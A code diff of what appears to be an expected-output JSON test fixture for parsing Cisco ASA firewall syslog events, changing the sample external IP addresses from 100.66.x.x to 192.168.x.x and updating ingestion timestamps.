@@ -2159,8 +2159,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111598241Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", + "ingested": "2021-12-09T13:31:36.363373300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2176,7 +2176,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11760", "source_interface": "outside", "mapped_destination_port": 1773 @@ -2193,8 +2193,8 @@ }, "destination": { "port": 8258, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1774, @@ -2234,7 +2234,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2242,8 +2242,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111599873Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258", + "ingested": "2021-12-09T13:31:36.363377600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2276,8 +2276,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" 
@@ -2312,7 +2312,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2321,8 +2321,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111601536Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", + "ingested": "2021-12-09T13:31:36.363381600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2338,7 +2338,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11761", "source_interface": "outside", "mapped_destination_port": 1774 @@ -2360,8 +2360,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2396,7 +2396,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2405,8 +2405,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111603181Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363385800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -2422,7 +2422,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.238.126", + "mapped_source_ip": "192.168.238.126", "connection_id": "11762", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2444,8 +2444,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2480,7 +2480,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2489,8 +2489,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111604859Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363389800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2506,7 +2506,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.93.51", + "mapped_source_ip": "192.168.93.51", "connection_id": "11763", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2528,8 +2528,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2564,7 +2564,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, 
@@ -2574,8 +2574,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111606551Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", + "ingested": "2021-12-09T13:31:36.363394100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2612,8 +2612,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2648,7 +2648,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2658,8 +2658,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111613702Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", + "ingested": "2021-12-09T13:31:36.363398400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2691,8 +2691,8 @@ }, "destination": { "port": 8259, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1775, @@ -2732,7 +2732,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -2740,8 +2740,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111615442Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259", + "ingested": "2021-12-09T13:31:36.363403Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2774,8 +2774,8 @@ }, "source": { "port": 443, - "address": "100.66.225.103", - "ip": "100.66.225.103" + "address": "192.168.225.103", + "ip": "192.168.225.103" }, "tags": [ "preserve_original_event" @@ -2810,7 +2810,7 @@ "localhost" ], "ip": [ - "100.66.225.103", + "192.168.225.103", "172.31.98.44" ] }, @@ -2819,8 +2819,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111617090Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", + "ingested": "2021-12-09T13:31:36.363406900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2836,7 +2836,7 @@ "destination_interface": "inside", "mapped_source_port": 443, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.225.103", + "mapped_source_ip": "192.168.225.103", "connection_id": "11764", "source_interface": "outside", "mapped_destination_port": 1775 @@ -2853,8 +2853,8 @@ }, "destination": { "port": 1189, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, 
@@ -2894,7 +2894,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2902,8 +2902,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111618941Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189", + "ingested": "2021-12-09T13:31:36.363410500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2936,8 +2936,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -2972,7 +2972,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -2981,8 +2981,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111620598Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363414600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2998,7 +2998,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.240.126", + "mapped_source_ip": "192.168.240.126", "connection_id": "11772", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -3020,8 +3020,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3056,7 +3056,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3065,8 +3065,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111622286Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363419500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3082,7 +3082,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.44.45", + "mapped_source_ip": "192.168.44.45", "connection_id": "11773", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3104,8 +3104,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -3140,7 +3140,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, 
@@ -3150,8 +3150,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111623941Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", + "ingested": "2021-12-09T13:31:36.363424600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3188,8 +3188,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3224,7 +3224,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3234,8 +3234,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111625568Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", + "ingested": "2021-12-09T13:31:36.363429100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3267,8 +3267,8 @@ }, "destination": { "port": 8265, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1452, @@ -3308,7 +3308,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -3316,8 +3316,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111627193Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265", + "ingested": "2021-12-09T13:31:36.363433500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3350,8 +3350,8 @@ }, "source": { "port": 80, - "address": "100.66.179.219", - "ip": "100.66.179.219" + "address": "192.168.179.219", + "ip": "192.168.179.219" }, "tags": [ "preserve_original_event" @@ -3386,7 +3386,7 @@ "localhost" ], "ip": [ - "100.66.179.219", + "192.168.179.219", "172.31.98.44" ] }, @@ -3395,8 +3395,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111628893Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", + "ingested": "2021-12-09T13:31:36.363438Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3412,7 +3412,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.219", + "mapped_source_ip": "192.168.179.219", "connection_id": "11774", "source_interface": "outside", "mapped_destination_port": 1452 @@ -3434,8 +3434,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" 
@@ -3470,7 +3470,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3479,8 +3479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111630499Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363442900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3496,7 +3496,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.157.232", + "mapped_source_ip": "192.168.157.232", "connection_id": "11775", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3518,8 +3518,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3554,7 +3554,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3563,8 +3563,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111632137Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363447Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -3580,7 +3580,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.178.133", + "mapped_source_ip": "192.168.178.133", "connection_id": "11776", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3602,8 +3602,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3638,7 +3638,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3648,8 +3648,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111633784Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", + "ingested": "2021-12-09T13:31:36.363452100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3686,8 +3686,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3722,7 +3722,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, 
@@ -3732,8 +3732,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111635426Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", + "ingested": "2021-12-09T13:31:36.363457900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3765,8 +3765,8 @@ }, "destination": { "port": 8266, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1453, @@ -3806,7 +3806,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3814,8 +3814,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111637048Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266", + "ingested": "2021-12-09T13:31:36.363462700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3848,8 +3848,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3884,7 +3884,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, 
@@ -3893,8 +3893,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111638855Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", + "ingested": "2021-12-09T13:31:36.363466400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3910,7 +3910,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.133.112", + "mapped_source_ip": "192.168.133.112", "connection_id": "11777", "source_interface": "outside", "mapped_destination_port": 1453 @@ -3932,8 +3932,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3968,7 +3968,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3979,8 +3979,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111640482Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "ingested": "2021-12-09T13:31:36.363470900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -4017,8 +4017,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4053,7 +4053,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4062,8 +4062,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111642139Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363476700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4079,7 +4079,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.204.197", + "mapped_source_ip": "192.168.204.197", "connection_id": "11779", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4101,8 +4101,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -4137,7 +4137,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, 
@@ -4147,8 +4147,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111643791Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:31:36.363481500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4185,8 +4185,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4221,7 +4221,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4231,8 +4231,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111645590Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", + "ingested": "2021-12-09T13:31:36.363486Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4264,8 +4264,8 @@ }, "destination": { "port": 8267, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1454, @@ -4305,7 +4305,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -4313,8 +4313,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111647250Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267", + "ingested": "2021-12-09T13:31:36.363490600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4347,8 +4347,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4383,7 +4383,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4392,8 +4392,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111648940Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", + "ingested": "2021-12-09T13:31:36.363496500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4409,7 +4409,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - 